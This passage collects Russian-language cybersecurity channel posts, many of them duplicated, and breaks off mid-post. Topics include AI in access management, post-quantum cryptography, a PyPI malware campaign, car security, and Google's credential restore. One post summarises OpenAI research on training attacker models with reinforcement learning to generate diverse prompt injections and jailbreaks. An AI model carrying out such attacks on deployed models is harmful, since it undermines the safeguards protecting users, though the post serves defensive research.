1. Автоматизированные проверки: Используйте инструменты для анализа безопасности, такие как AI Reviewer Presubmit, для мгновенной проверки коммитов.
2. Ручная проверка: Внимательно анализируйте пул-реквесты, особенно от неизвестных пользователей.
3. Защита репозиториев: Ограничьте доступ для коммитов и настройте уведомления об изменениях в репозиториях.
🔗 Этот инцидент напомнил о ранее известных атаках на цепочку поставок, таких как xz, где злоумышленники встраивали вредоносный код в популярные библиотеки с открытым исходным кодом.
Stay secure and read SecureTechTalks 📚
#GitHub #Киберугрозы #ОткрытыйКод #Безопасность
👍1
🔐 Искусственный интеллект и управление доступом: новая эра безопасности
🤖 Искусственный интеллект и управление доступом кардинально меняют подходы к обеспечению безопасности. Сегодня IAM выходит за рамки защиты человеческих идентификаторов и охватывает автономные системы, API и подключенные устройства.
📊 Как AI влияет на ключевые элементы IAM?
🛡️ Интеллектуальный мониторинг и обнаружение аномалий
AI анализирует поведение как человеческих, так и машинных идентификаторов, включая API и сервисные учетные записи. Он создает базовые показатели "нормального" поведения и мгновенно обнаруживает отклонения, сигнализирующие о возможных угрозах.
Например, AI может выявить необычные модели доступа в контейнеризированных приложениях или аномальные объемы передачи данных, предотвращая потенциальные утечки на ранних стадиях.
📜 Расширенное управление доступом (Access Governance)
AI позволяет реализовать принцип наименьших привилегий, анализируя поведенческие данные идентификаторов и автоматизируя управление правами. В реальном времени система выявляет нарушения политик и адаптирует настройки безопасности под текущую ситуацию.
Кроме того, AI обеспечивает контекстно-зависимую аутентификацию, оценивая риск на основе данных о чувствительности ресурсов и текущей угрозе, создавая надежную защиту без помех для легитимных пользователей.
🚀 Улучшение пользовательского опыта
AI оптимизирует процесс управления доступом:
- Автоматизация назначения ролей на основе функционала сотрудников.
- Реализация динамического доступа Just-in-Time (JIT), который активируется только при необходимости. Это минимизирует привилегии, которые могут быть использованы злоумышленниками.
🛠️ Персонализация и настройка
AI анализирует поведение пользователей и рабочие процессы, автоматически предлагая индивидуализированные настройки, которые уменьшают риски.
Например, временные сотрудники получают доступ, ограниченный сроком их работы, а подрядчикам предоставляются только те права, которые необходимы для выполнения задач.
🔎 Снижение ложных срабатываний
Традиционные системы обнаружения угроз часто страдают от высокого уровня ложных срабатываний. AI анализирует большие массивы данных, чтобы минимизировать такие ошибки и сосредоточиться на реальных угрозах, что ускоряет реакцию и оптимизирует использование ресурсов.
🛠️ Практическое применение AI в IAM
1. Управление привилегированным доступом (PAM)
AI отслеживает и блокирует подозрительные действия привилегированных учетных записей.
💡 Например, если поведение отклоняется от обычного, система автоматически завершает сессию.
2. Управление идентификацией и администрирование (IGA)
AI автоматизирует жизненный цикл машинных идентификаторов, минимизируя избыточные привилегии. Это особенно важно в условиях масштабируемых облачных сред.
3. Управление секретами
AI помогает управлять ключами и паролями, прогнозируя сроки их действия и предлагая автоматическую ротацию для высокорискованных секретов. Это распространяется на DevOps-платформы, CI/CD, и инструменты совместной работы.
🧠 Атаки на машинные идентификаторы
С помощью машинного обучения AI может моделировать атаки на машинные идентификаторы, выявляя потенциальные слабые места. Это позволяет компаниям заранее усиливать защиту и улучшать стратегию IAM.
🔮 Будущее IAM с AI
Эволюция IAM превращает кибербезопасность из реактивного подхода в проактивный. Искусственный интеллект не только защищает, но и прогнозирует угрозы, адаптируя защитные механизмы под новые вызовы.
Stay secure and read SecureTechTalks 📚
#IAM #AI #Кибербезопасность #УправлениеДоступом #МашинноеОбучение
🤖 Искусственный интеллект и управление доступом кардинально меняют подходы к обеспечению безопасности. Сегодня IAM выходит за рамки защиты человеческих идентификаторов и охватывает автономные системы, API и подключенные устройства.
📊 Как AI влияет на ключевые элементы IAM?
🛡️ Интеллектуальный мониторинг и обнаружение аномалий
AI анализирует поведение как человеческих, так и машинных идентификаторов, включая API и сервисные учетные записи. Он создает базовые показатели "нормального" поведения и мгновенно обнаруживает отклонения, сигнализирующие о возможных угрозах.
Например, AI может выявить необычные модели доступа в контейнеризированных приложениях или аномальные объемы передачи данных, предотвращая потенциальные утечки на ранних стадиях.
📜 Расширенное управление доступом (Access Governance)
AI позволяет реализовать принцип наименьших привилегий, анализируя поведенческие данные идентификаторов и автоматизируя управление правами. В реальном времени система выявляет нарушения политик и адаптирует настройки безопасности под текущую ситуацию.
Кроме того, AI обеспечивает контекстно-зависимую аутентификацию, оценивая риск на основе данных о чувствительности ресурсов и текущей угрозе, создавая надежную защиту без помех для легитимных пользователей.
🚀 Улучшение пользовательского опыта
AI оптимизирует процесс управления доступом:
- Автоматизация назначения ролей на основе функционала сотрудников.
- Реализация динамического доступа Just-in-Time (JIT), который активируется только при необходимости. Это минимизирует привилегии, которые могут быть использованы злоумышленниками.
🛠️ Персонализация и настройка
AI анализирует поведение пользователей и рабочие процессы, автоматически предлагая индивидуализированные настройки, которые уменьшают риски.
Например, временные сотрудники получают доступ, ограниченный сроком их работы, а подрядчикам предоставляются только те права, которые необходимы для выполнения задач.
🔎 Снижение ложных срабатываний
Традиционные системы обнаружения угроз часто страдают от высокого уровня ложных срабатываний. AI анализирует большие массивы данных, чтобы минимизировать такие ошибки и сосредоточиться на реальных угрозах, что ускоряет реакцию и оптимизирует использование ресурсов.
🛠️ Практическое применение AI в IAM
1. Управление привилегированным доступом (PAM)
AI отслеживает и блокирует подозрительные действия привилегированных учетных записей.
💡 Например, если поведение отклоняется от обычного, система автоматически завершает сессию.
2. Управление идентификацией и администрирование (IGA)
AI автоматизирует жизненный цикл машинных идентификаторов, минимизируя избыточные привилегии. Это особенно важно в условиях масштабируемых облачных сред.
3. Управление секретами
AI помогает управлять ключами и паролями, прогнозируя сроки их действия и предлагая автоматическую ротацию для высокорискованных секретов. Это распространяется на DevOps-платформы, CI/CD, и инструменты совместной работы.
🧠 Атаки на машинные идентификаторы
С помощью машинного обучения AI может моделировать атаки на машинные идентификаторы, выявляя потенциальные слабые места. Это позволяет компаниям заранее усиливать защиту и улучшать стратегию IAM.
🔮 Будущее IAM с AI
Эволюция IAM превращает кибербезопасность из реактивного подхода в проактивный. Искусственный интеллект не только защищает, но и прогнозирует угрозы, адаптируя защитные механизмы под новые вызовы.
Stay secure and read SecureTechTalks 📚
#IAM #AI #Кибербезопасность #УправлениеДоступом #МашинноеОбучение
👍1
🛡Стратегия защиты от квантовых угроз
🔒 Квантовые компьютеры и угроза безопасности
С развитием квантовых технологий наши привычные системы шифрования сталкиваются с новой реальностью. Алгоритмы, такие как RSA, основанные на сложных математических расчетах, могут быть вскоре скомпрометированы квантовыми компьютерами. Доклад NIST предлагает стратегическую дорожную карту для перехода к квантово-устойчивой криптографии, способной защитить данные в этой новой эре.
🔍 Квантовые компьютеры способны взламывать многие современные шифры, ставя под угрозу долгосрочные данные. Утечка данных сегодня может обернуться их расшифровкой через несколько лет, когда квантовые системы станут более развитыми. Документ предлагает комплексный подход к подготовке организаций к таким вызовам.
🛤 Трехуровневая стратегия перехода: STL-QCRYPTO
Разработанная структура охватывает три ключевых уровня безопасности:
1️⃣ STL-1: Основной уровень
Использование алгоритмов постквантовой криптографии, таких как CRYSTAL-Kyber и SPHINCS+.
Подходит для быстрого внедрения с минимальными изменениями в инфраструктуре.
2️⃣ STL-2: Промежуточный уровень
Гибридный подход: использование квантовых генераторов случайных чисел (QRNG) совместно с классическими алгоритмами.
Усиление защиты через истинно случайные ключи.
3️⃣ STL-3: Продвинутый уровень
Переход на квантовую криптографию (QKD) для максимально безопасного обмена ключами.
Полный переход на квантовые технологии требует значительных ресурсов, но обеспечивает непревзойденную безопасность.
🔗 Подробнее про исследование можно прочитать тут.
Stay secure and read SecureTechTalks 📚
#КвантоваяКриптография #Кибербезопасность #ПостквантоваяЗащита #SecureTechTalks
🔒 Квантовые компьютеры и угроза безопасности
С развитием квантовых технологий наши привычные системы шифрования сталкиваются с новой реальностью. Алгоритмы, такие как RSA, основанные на сложных математических расчетах, могут быть вскоре скомпрометированы квантовыми компьютерами. Доклад NIST предлагает стратегическую дорожную карту для перехода к квантово-устойчивой криптографии, способной защитить данные в этой новой эре.
🔍 Квантовые компьютеры способны взламывать многие современные шифры, ставя под угрозу долгосрочные данные. Утечка данных сегодня может обернуться их расшифровкой через несколько лет, когда квантовые системы станут более развитыми. Документ предлагает комплексный подход к подготовке организаций к таким вызовам.
🛤 Трехуровневая стратегия перехода: STL-QCRYPTO
Разработанная структура охватывает три ключевых уровня безопасности:
1️⃣ STL-1: Основной уровень
Использование алгоритмов постквантовой криптографии, таких как CRYSTAL-Kyber и SPHINCS+.
Подходит для быстрого внедрения с минимальными изменениями в инфраструктуре.
2️⃣ STL-2: Промежуточный уровень
Гибридный подход: использование квантовых генераторов случайных чисел (QRNG) совместно с классическими алгоритмами.
Усиление защиты через истинно случайные ключи.
3️⃣ STL-3: Продвинутый уровень
Переход на квантовую криптографию (QKD) для максимально безопасного обмена ключами.
Полный переход на квантовые технологии требует значительных ресурсов, но обеспечивает непревзойденную безопасность.
🔗 Подробнее про исследование можно прочитать тут.
Stay secure and read SecureTechTalks 📚
#КвантоваяКриптография #Кибербезопасность #ПостквантоваяЗащита #SecureTechTalks
👍1
🛡️ Учим школьников безопасности в интернете: бесплатный курс от Яндекса
🖥️ «Яндекс Браузер для образования» в сотрудничестве с «Яндекс Учебником» представили новый онлайн-курс для школьников 7-9 классов. Этот образовательный проект обучает базовым навыкам безопасного поведения в интернете: как распознавать мошеннические сайты, защищать свои аккаунты и создавать надёжные пароли.
📊 Проблема актуальна как никогда: по данным исследований, около 72% школьников сталкиваются с онлайн-мошенничеством. Ежедневно «Яндекс Браузер» блокирует более 600 мошеннических доменов, многие из которых маскируются под игровые сайты. Такие ресурсы заманивают школьников обещаниями бесплатных бонусов, раннего доступа к играм или участия в турнирах с призами. После перехода по ссылкам детей просят ввести свои логины и пароли, которые затем попадают к злоумышленникам.
🔍 Как защитить школьников?
Курс предлагает погрузиться в интерактивный детективный квест, где школьники на практике учатся:
- Различать фишинговые сайты;
- Понимать, зачем нужна двухфакторная аутентификация;
- Создавать и использовать надёжные пароли.
📚 Структура курса
Курс включает два урока продолжительностью по 20-25 минут:
1️⃣ Защита аккаунтов: как настроить безопасность и предотвратить утечку данных.
2️⃣ Распознавание мошеннических сайтов: что такое фишинг и как не попасться на уловки злоумышленников.
Учителя могут использовать эти материалы на уроках информатики или рекомендовать их для самостоятельного изучения дома.
🔒 О проекте «Яндекс Браузер для образования»
Эта специальная версия браузера создана для школ и образовательных учреждений. Она:
- Очищает все пользовательские данные после окончания урока;
- Фильтрует контент, ограничивая доступ к нежелательным ресурсам;
- Помогает создавать безопасное цифровое пространство для учеников и учителей.
🌐 Доступ к курсу бесплатный. Он размещён на платформе «Яндекс Учебник» и доступен каждому.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #цифроваяграмотность #SecureTechTalks #интернетбезопасность #Яндекс
🖥️ «Яндекс Браузер для образования» в сотрудничестве с «Яндекс Учебником» представили новый онлайн-курс для школьников 7-9 классов. Этот образовательный проект обучает базовым навыкам безопасного поведения в интернете: как распознавать мошеннические сайты, защищать свои аккаунты и создавать надёжные пароли.
📊 Проблема актуальна как никогда: по данным исследований, около 72% школьников сталкиваются с онлайн-мошенничеством. Ежедневно «Яндекс Браузер» блокирует более 600 мошеннических доменов, многие из которых маскируются под игровые сайты. Такие ресурсы заманивают школьников обещаниями бесплатных бонусов, раннего доступа к играм или участия в турнирах с призами. После перехода по ссылкам детей просят ввести свои логины и пароли, которые затем попадают к злоумышленникам.
🔍 Как защитить школьников?
Курс предлагает погрузиться в интерактивный детективный квест, где школьники на практике учатся:
- Различать фишинговые сайты;
- Понимать, зачем нужна двухфакторная аутентификация;
- Создавать и использовать надёжные пароли.
📚 Структура курса
Курс включает два урока продолжительностью по 20-25 минут:
1️⃣ Защита аккаунтов: как настроить безопасность и предотвратить утечку данных.
2️⃣ Распознавание мошеннических сайтов: что такое фишинг и как не попасться на уловки злоумышленников.
Учителя могут использовать эти материалы на уроках информатики или рекомендовать их для самостоятельного изучения дома.
🔒 О проекте «Яндекс Браузер для образования»
Эта специальная версия браузера создана для школ и образовательных учреждений. Она:
- Очищает все пользовательские данные после окончания урока;
- Фильтрует контент, ограничивая доступ к нежелательным ресурсам;
- Помогает создавать безопасное цифровое пространство для учеников и учителей.
🌐 Доступ к курсу бесплатный. Он размещён на платформе «Яндекс Учебник» и доступен каждому.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #цифроваяграмотность #SecureTechTalks #интернетбезопасность #Яндекс
👍1
🚨 Внимание: вредоносные пакеты на PyPI крадут данные через поддельные библиотеки ChatGPT и Claude AI
🛡️ Исследователи обнаружили два вредоносных пакета на платформе Python Package Index (PyPI), которые маскировались под популярные модели искусственного интеллекта ChatGPT и Claude AI. Пакеты, названные gptplus и claudeai-eng, содержали вредоносное ПО JarkaStealer, предназначенное для кражи конфиденциальной информации.
📦 Как работали пакеты?
Оба пакета были загружены пользователем под псевдонимом "Xeroline" в ноябре 2023 года и суммарно скачаны более 3,500 раз до удаления с PyPI. Пакеты якобы предоставляли доступ к API GPT-4 Turbo и Claude AI, но на деле содержали вредоносный код:
1️⃣ При установке пакетов выполнялся файл init.py, содержащий Base64-закодированные данные.
2️⃣ Код загружал файл JavaUpdater.jar из репозитория GitHub и, при необходимости, скачивал Java Runtime Environment (JRE) из Dropbox.
3️⃣ Запускался JavaUpdater.jar, который активировал JarkaStealer — вредоносный инструмент для кражи данных.
📂 Что крадёт JarkaStealer?
- Данные браузеров (включая пароли и куки).
- Системную информацию.
- Скриншоты.
- Токены сессий приложений, таких как Telegram, Discord, Steam.
Все собранные данные архивировались, отправлялись на сервер атакующего и затем удалялись с устройства жертвы.
💻 Кто пострадал?
По данным ClickPy, наибольшее количество загрузок пакетов зафиксировано в США, Китае, Индии, Франции, Германии и России. Эта кампания стала частью годового цикла атак на цепочку поставок программного обеспечения.
💰 JarkaStealer как MaaS
JarkaStealer распространяется через Telegram-каналы в модели "малварь как услуга" (MaaS). Стоимость варьируется от $20 до $50, а исходный код даже был слит в публичный доступ на GitHub.
🔑 Что делать разработчикам?
1⃣ Всегда проверяйте подлинность библиотек перед их установкой.
2⃣ Используйте инструменты для анализа зависимостей и уязвимостей в open-source компонентах.
3⃣ Будьте особенно внимательны к недавно опубликованным пакетам и тем, у которых минимальные отзывы.
4⃣ Регулярно обновляйте антивирусное ПО и проводите аудит своих проектов.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #поставкиПО #PyPI #SecureTechTalks #вредоносноеПО #OpenSourceРиски
🛡️ Исследователи обнаружили два вредоносных пакета на платформе Python Package Index (PyPI), которые маскировались под популярные модели искусственного интеллекта ChatGPT и Claude AI. Пакеты, названные gptplus и claudeai-eng, содержали вредоносное ПО JarkaStealer, предназначенное для кражи конфиденциальной информации.
📦 Как работали пакеты?
Оба пакета были загружены пользователем под псевдонимом "Xeroline" в ноябре 2023 года и суммарно скачаны более 3,500 раз до удаления с PyPI. Пакеты якобы предоставляли доступ к API GPT-4 Turbo и Claude AI, но на деле содержали вредоносный код:
1️⃣ При установке пакетов выполнялся файл init.py, содержащий Base64-закодированные данные.
2️⃣ Код загружал файл JavaUpdater.jar из репозитория GitHub и, при необходимости, скачивал Java Runtime Environment (JRE) из Dropbox.
3️⃣ Запускался JavaUpdater.jar, который активировал JarkaStealer — вредоносный инструмент для кражи данных.
📂 Что крадёт JarkaStealer?
- Данные браузеров (включая пароли и куки).
- Системную информацию.
- Скриншоты.
- Токены сессий приложений, таких как Telegram, Discord, Steam.
Все собранные данные архивировались, отправлялись на сервер атакующего и затем удалялись с устройства жертвы.
💻 Кто пострадал?
По данным ClickPy, наибольшее количество загрузок пакетов зафиксировано в США, Китае, Индии, Франции, Германии и России. Эта кампания стала частью годового цикла атак на цепочку поставок программного обеспечения.
💰 JarkaStealer как MaaS
JarkaStealer распространяется через Telegram-каналы в модели "малварь как услуга" (MaaS). Стоимость варьируется от $20 до $50, а исходный код даже был слит в публичный доступ на GitHub.
🔑 Что делать разработчикам?
1⃣ Всегда проверяйте подлинность библиотек перед их установкой.
2⃣ Используйте инструменты для анализа зависимостей и уязвимостей в open-source компонентах.
3⃣ Будьте особенно внимательны к недавно опубликованным пакетам и тем, у которых минимальные отзывы.
4⃣ Регулярно обновляйте антивирусное ПО и проводите аудит своих проектов.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #поставкиПО #PyPI #SecureTechTalks #вредоносноеПО #OpenSourceРиски
👍1
🛡Расширенные подходы к Red Teaming: автоматизация и диверсификация атак
Исследователи из OpenAI представили усовершенствованный подход к автоматизированному Red Teaming, направленный на выявление слабостей моделей машинного обучения. Работа акцентирует внимание на создании атак, которые одновременно разнообразны и эффективны. В статье выделены основные методы, используемые для построения более надежной системы:
🔍 Система автоматического поиска уязвимостей
Red Teaming делится на два ключевых этапа:
1⃣ Генерация разнообразных целей атаки. Использование больших языковых моделей (LLM) для создания разнообразных сценариев атак.
2⃣ Создание успешных атак. Обучение атакующей модели (Red Team) на основе генеративных целей с применением методов многослойного обучения с подкреплением (RL).
📈 Нововведения в области обучения атакующих моделей
1⃣ Диверсифицированные цели: Сценарии атак включают как "инъекции запросов" (Prompt Injection), так и "jailbreaking" для обхода правил безопасности.
2⃣ Награды на основе правил: Используются автоматические функции наград, оценивающие успех атаки по заранее заданным критериям.
3⃣ Многошаговое обучение: Модель поощряется за создание новых, не похожих на предыдущие атаки, что увеличивает разнообразие.
🛠 Примеры применения
- Инъекции запросов: Встраивание вредоносных инструкций в данные третьих сторон, чтобы модель нарушала правила.
- Jailbreaking: Принуждение модели к генерации нежелательного контента.
🧠 Ключевые достижения
- Увеличение разнообразия атак на 30% по сравнению с традиционными методами.
- Улучшенная адаптивность атакующих моделей для реальных сценариев.
🚀 Практическая ценность
Исследование позволяет компаниям создавать более надежные механизмы защиты, тестируя модели на реальные угрозы. Подходы, описанные в статье, применимы для проверки безопасности AI-моделей, используемых в здравоохранении, финансах и других критически важных сферах.
🔗 Полный текст исследования доступен здесь.
Stay secure and read SecureTechTalks 📚
#CyberSecurity #RedTeaming #AI
Исследователи из OpenAI представили усовершенствованный подход к автоматизированному Red Teaming, направленный на выявление слабостей моделей машинного обучения. Работа акцентирует внимание на создании атак, которые одновременно разнообразны и эффективны. В статье выделены основные методы, используемые для построения более надежной системы:
🔍 Система автоматического поиска уязвимостей
Red Teaming делится на два ключевых этапа:
1⃣ Генерация разнообразных целей атаки. Использование больших языковых моделей (LLM) для создания разнообразных сценариев атак.
2⃣ Создание успешных атак. Обучение атакующей модели (Red Team) на основе генеративных целей с применением методов многослойного обучения с подкреплением (RL).
📈 Нововведения в области обучения атакующих моделей
1⃣ Диверсифицированные цели: Сценарии атак включают как "инъекции запросов" (Prompt Injection), так и "jailbreaking" для обхода правил безопасности.
2⃣ Награды на основе правил: Используются автоматические функции наград, оценивающие успех атаки по заранее заданным критериям.
3⃣ Многошаговое обучение: Модель поощряется за создание новых, не похожих на предыдущие атаки, что увеличивает разнообразие.
🛠 Примеры применения
- Инъекции запросов: Встраивание вредоносных инструкций в данные третьих сторон, чтобы модель нарушала правила.
- Jailbreaking: Принуждение модели к генерации нежелательного контента.
🧠 Ключевые достижения
- Увеличение разнообразия атак на 30% по сравнению с традиционными методами.
- Улучшенная адаптивность атакующих моделей для реальных сценариев.
🚀 Практическая ценность
Исследование позволяет компаниям создавать более надежные механизмы защиты, тестируя модели на реальные угрозы. Подходы, описанные в статье, применимы для проверки безопасности AI-моделей, используемых в здравоохранении, финансах и других критически важных сферах.
🔗 Полный текст исследования доступен здесь.
Stay secure and read SecureTechTalks 📚
#CyberSecurity #RedTeaming #AI
👍2
🔒 Минпромторг России инициирует создание национальной системы кибербезопасности автомобилей
В ответ на растущие угрозы кибератак на современные автомобили, Министерство промышленности и торговли Российской Федерации (Минпромторг) заказало экспертно-аналитическое исследование для разработки предложений по созданию национальной системы кибербезопасности транспортных средств.
🚗 Уязвимости современных автомобилей
Современные автомобили оснащены множеством электронных систем, включая блоки управления двигателем, тормозной системой и системами помощи водителю. Эти компоненты, будучи подключенными к интернету, становятся потенциальными целями для хакеров.
Возможные атаки могут привести к:
- Удаленному управлению автомобилем: злоумышленники могут получить контроль над основными функциями транспортного средства.
- Кражам данных: сбор информации о маршрутах, привычках водителя и других конфиденциальных данных.
- Нарушению работы систем безопасности: отключение или искажение работы систем, обеспечивающих безопасность пассажиров.
🔧 Планы Минпромторга
В рамках инициативы планируется:
- Разработка стандартов кибербезопасности: установление требований к производителям автомобилей и компонентов для обеспечения защиты от кибератак.
- Создание системы сертификации: проверка транспортных средств на соответствие установленным стандартам безопасности.
- Обучение специалистов: подготовка кадров, способных выявлять и предотвращать киберугрозы в автомобильной отрасли.
🌐 Международный опыт
Многие страны уже внедряют меры по обеспечению кибербезопасности автомобилей. Например, в Европейском Союзе с 2022 года действуют требования к производителям по обеспечению защиты от кибератак, а в США Национальная администрация безопасности дорожного движения (NHTSA) разрабатывает рекомендации для автопроизводителей.
🔍 Инициатива Минпромторга направлена на повышение уровня безопасности российских автомобилей в условиях цифровизации и роста киберугроз. Создание национальной системы кибербезопасности транспортных средств позволит защитить водителей и пассажиров от потенциальных рисков, связанных с кибератаками.
Stay secure and read SecureTechTalks 📚
#Кибербезопасность #Автомобили #Минпромторг
В ответ на растущие угрозы кибератак на современные автомобили, Министерство промышленности и торговли Российской Федерации (Минпромторг) заказало экспертно-аналитическое исследование для разработки предложений по созданию национальной системы кибербезопасности транспортных средств.
🚗 Уязвимости современных автомобилей
Современные автомобили оснащены множеством электронных систем, включая блоки управления двигателем, тормозной системой и системами помощи водителю. Эти компоненты, будучи подключенными к интернету, становятся потенциальными целями для хакеров.
Возможные атаки могут привести к:
- Удаленному управлению автомобилем: злоумышленники могут получить контроль над основными функциями транспортного средства.
- Кражам данных: сбор информации о маршрутах, привычках водителя и других конфиденциальных данных.
- Нарушению работы систем безопасности: отключение или искажение работы систем, обеспечивающих безопасность пассажиров.
🔧 Планы Минпромторга
В рамках инициативы планируется:
- Разработка стандартов кибербезопасности: установление требований к производителям автомобилей и компонентов для обеспечения защиты от кибератак.
- Создание системы сертификации: проверка транспортных средств на соответствие установленным стандартам безопасности.
- Обучение специалистов: подготовка кадров, способных выявлять и предотвращать киберугрозы в автомобильной отрасли.
🌐 Международный опыт
Многие страны уже внедряют меры по обеспечению кибербезопасности автомобилей. Например, в Европейском Союзе с 2022 года действуют требования к производителям по обеспечению защиты от кибератак, а в США Национальная администрация безопасности дорожного движения (NHTSA) разрабатывает рекомендации для автопроизводителей.
🔍 Инициатива Минпромторга направлена на повышение уровня безопасности российских автомобилей в условиях цифровизации и роста киберугроз. Создание национальной системы кибербезопасности транспортных средств позволит защитить водителей и пассажиров от потенциальных рисков, связанных с кибератаками.
Stay secure and read SecureTechTalks 📚
#Кибербезопасность #Автомобили #Минпромторг
👍1
⚖ Законотворчество против ИБ: чем грозит новый проект о персональных данных?
🔒 В Госдуме обсуждается законопроект, который вводит уголовную ответственность за незаконный оборот персональных данных. Однако его положения вызывают серьезные вопросы у экспертов по кибербезопасности.
📖 В обновленной редакции законопроекта нет исключений для специалистов, которые занимаются защитой инфраструктуры, расследованием утечек и анализом украденных данных. Это может привести к ситуации, когда действия по расследованию инцидентов и противодействию злоумышленникам окажутся вне закона.
🚨 Согласно документу, ответственность наступает за создание инструментов или платформ для хранения и передачи персональных данных, добытых незаконным путем. Максимальное наказание – до 5 лет лишения свободы или штраф до 700 тысяч рублей.
🛡️ Эксперты отмечают, что усиление контроля может сократить количество нелегальных ресурсов, но полностью проблему не решит. Злоумышленники всё равно сохранят доступ к инструментам для атак.
Что предлагают специалисты?
1. 🔍 Закрепить в законе исключения для компаний, расследующих утечки.
2. ✅ Разрешить анализ украденных данных в рамках противодействия киберпреступникам.
3. 📢 Ввести правовые нормы для мониторинга и уведомления пострадавших.
4. 📑 Прописать критерии и условия работы с утёкшими данными, чтобы действия экспертов оставались в правовом поле.
🚫 Без этих доработок компании могут столкнуться с ограничением своих функций, включая мониторинг даркнета и расследование инцидентов. Это создаст дополнительные риски для всех, особенно для малого и среднего бизнеса, который сильно зависит от ИБ-экспертов.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #утечкиданных #законопроект #SecureTechTalks #информационнаябезопасность #персональныеданные
🔒 В Госдуме обсуждается законопроект, который вводит уголовную ответственность за незаконный оборот персональных данных. Однако его положения вызывают серьезные вопросы у экспертов по кибербезопасности.
📖 В обновленной редакции законопроекта нет исключений для специалистов, которые занимаются защитой инфраструктуры, расследованием утечек и анализом украденных данных. Это может привести к ситуации, когда действия по расследованию инцидентов и противодействию злоумышленникам окажутся вне закона.
🚨 Согласно документу, ответственность наступает за создание инструментов или платформ для хранения и передачи персональных данных, добытых незаконным путем. Максимальное наказание – до 5 лет лишения свободы или штраф до 700 тысяч рублей.
🛡️ Эксперты отмечают, что усиление контроля может сократить количество нелегальных ресурсов, но полностью проблему не решит. Злоумышленники всё равно сохранят доступ к инструментам для атак.
Что предлагают специалисты?
1. 🔍 Закрепить в законе исключения для компаний, расследующих утечки.
2. ✅ Разрешить анализ украденных данных в рамках противодействия киберпреступникам.
3. 📢 Ввести правовые нормы для мониторинга и уведомления пострадавших.
4. 📑 Прописать критерии и условия работы с утёкшими данными, чтобы действия экспертов оставались в правовом поле.
🚫 Без этих доработок компании могут столкнуться с ограничением своих функций, включая мониторинг даркнета и расследование инцидентов. Это создаст дополнительные риски для всех, особенно для малого и среднего бизнеса, который сильно зависит от ИБ-экспертов.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #утечкиданных #законопроект #SecureTechTalks #информационнаябезопасность #персональныеданные
🔐 Google представляет функцию Restore Credentials для безопасного восстановления доступа к аккаунтам
📱 Упрощение перехода на новое устройство
Google анонсировала функцию Restore Credentials, которая позволит пользователям безопасно восстанавливать доступ к аккаунтам в сторонних приложениях после перехода на новое Android-устройство. Новинка стала частью Credential Manager API и направлена на снижение неудобств, связанных с повторным вводом логинов и паролей после смены телефона.
🔄 Как это работает?
Процесс восстановления выполняется автоматически при переносе данных и приложений с предыдущего устройства. Пользователи смогут мгновенно войти в свои аккаунты без дополнительных действий.
Ключ восстановления: При входе в приложение с поддержкой этой функции на устройстве создаётся ключ восстановления — это публичный ключ, совместимый со стандартами FIDO2, такими как Passkeys.
Шифрование и хранение: Ключ сохраняется в Credential Manager в локальном зашифрованном виде. Если включена облачная резервная копия, ключ может быть дополнительно загружен в облако.
Автоматический вход: При восстановлении данных на новом устройстве Credential Manager автоматически использует ключи восстановления для входа в аккаунты.
👨💻 Рекомендации для разработчиков
Google предлагает разработчикам приложений следующие действия:
1⃣ Генерировать ключ восстановления сразу после успешной аутентификации.
2⃣ Удалять ключ восстановления при выходе пользователя из аккаунта, чтобы избежать автоматического входа, если это не требуется.
🍏 Сравнение с Apple
Apple уже использует схожий механизм через атрибут kSecAttrAccessible в iCloud Keychain. Этот атрибут управляет доступом приложения к учётным данным и поддерживает возможность восстановления только на исходном устройстве или при переходе на новое.
🔒 Безопасность на новом уровне с Android 16
Анонс функции Restore Credentials совпал с выходом первой версии Developer Preview Android 16, которая включает:
- Обновлённый Privacy Dashboard с возможностью отслеживания использования приложениями чувствительных разрешений за последние 7 дней.
- Новые меры защиты, включая Theft Protection, Private Space, Sanitizers и Lockdown Mode, который отключает Smart Lock, биометрическую авторизацию и уведомления на экране блокировки.
Stay secure and read SecureTechTalks 📚
#Android16 #Cybersecurity #FIDO2 #CredentialManager
📱 Упрощение перехода на новое устройство
Google анонсировала функцию Restore Credentials, которая позволит пользователям безопасно восстанавливать доступ к аккаунтам в сторонних приложениях после перехода на новое Android-устройство. Новинка стала частью Credential Manager API и направлена на снижение неудобств, связанных с повторным вводом логинов и паролей после смены телефона.
🔄 Как это работает?
Процесс восстановления выполняется автоматически при переносе данных и приложений с предыдущего устройства. Пользователи смогут мгновенно войти в свои аккаунты без дополнительных действий.
Ключ восстановления: При входе в приложение с поддержкой этой функции на устройстве создаётся ключ восстановления — это публичный ключ, совместимый со стандартами FIDO2, такими как Passkeys.
Шифрование и хранение: Ключ сохраняется в Credential Manager в локальном зашифрованном виде. Если включена облачная резервная копия, ключ может быть дополнительно загружен в облако.
Автоматический вход: При восстановлении данных на новом устройстве Credential Manager автоматически использует ключи восстановления для входа в аккаунты.
👨💻 Рекомендации для разработчиков
Google предлагает разработчикам приложений следующие действия:
1⃣ Генерировать ключ восстановления сразу после успешной аутентификации.
2⃣ Удалять ключ восстановления при выходе пользователя из аккаунта, чтобы избежать автоматического входа, если это не требуется.
🍏 Сравнение с Apple
Apple уже использует схожий механизм через атрибут kSecAttrAccessible в iCloud Keychain. Этот атрибут управляет доступом приложения к учётным данным и поддерживает возможность восстановления только на исходном устройстве или при переходе на новое.
🔒 Безопасность на новом уровне с Android 16
Анонс функции Restore Credentials совпал с выходом первой версии Developer Preview Android 16, которая включает:
- Обновлённый Privacy Dashboard с возможностью отслеживания использования приложениями чувствительных разрешений за последние 7 дней.
- Новые меры защиты, включая Theft Protection, Private Space, Sanitizers и Lockdown Mode, который отключает Smart Lock, биометрическую авторизацию и уведомления на экране блокировки.
Stay secure and read SecureTechTalks 📚
#Android16 #Cybersecurity #FIDO2 #CredentialManager
⚙️ Microsoft Office: прощай конфиденциальность
В функциях Connected Experiences, встроенных в Microsoft Office, произошли изменения. Теперь контент, создаваемый пользователями в приложениях, может быть использован для обучения искусственного интеллекта, если пользователь не отключил эту опцию. На проблему обратил внимание пользователь одной из соцсетей, однако официальных комментариев от Microsoft пока не последовало.
📌 По умолчанию документы, такие как статьи, отчёты и даже личные заметки, могут стать частью набора данных для обучения ИИ. Для защиты своей интеллектуальной собственности и конфиденциальной информации пользователям рекомендуется изменить настройки.
🔍 Как отключить передачу данных?
1⃣ Зайдите в настройки Office.
